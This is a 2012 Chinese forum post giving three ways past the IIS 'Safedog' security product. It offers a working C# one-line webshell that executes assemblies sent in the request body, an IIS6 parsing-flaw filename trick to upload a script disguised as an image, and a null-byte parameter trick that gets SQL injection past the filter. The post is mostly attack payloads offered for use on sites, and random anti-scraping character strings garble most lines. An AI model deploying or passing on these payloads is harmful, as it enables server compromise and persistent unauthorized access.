1、绕过IIS安全狗的一句话。
( I4 S+ B4 n. x9 p- w" f1 }前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
( ^; A# R! [: P: R: M9 h" |<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。1 T- e' U. ]2 G
' g* L3 Y a( a: ?- v$ l+ d2、IIS6.0解析漏洞遇到安全狗。& A- m' b$ I) Z) F3 F
文件名为
) f& b, Q) G$ uhttp://www.xxxxx.com/sh3llc0de.asp;1.jpg
5 i0 r5 X* H, q: W" G- j# u& E1 _" [
; {7 f2 ~1 o1 i0 {" c, r$ S' C这样的会被IIS安全狗果断屏蔽。* J( }, @# V8 J0 [8 s
改成如下名称,IIS6一样会解析:
* \# a, ~1 u) [8 ?, x, m/ Fwww.xxxxx.com/;1.asp;1.jpg
: G6 k9 Y2 z8 k4 N2 x+ W! T+ D% z/ }
3、安全狗的注入绕过。
2 r! ~% d3 m! I. c- h9 h* P* |5 {# q7 [常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
' ~' w& D2 v' l4 N. y1 R但如果:% O K4 }& Y8 ]3 K% B7 S0 M
r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1: T" L1 w# j: F4 s* C1 U
就可以成功绕过了。0 U2 S$ e5 x3 h/ H
" h o9 Y" x5 }1 ~8 Q
: f. j3 i8 }5 U: J/ X/ ?+ J |
发表于 2012-10-31 08:25:30
收藏
支持
反对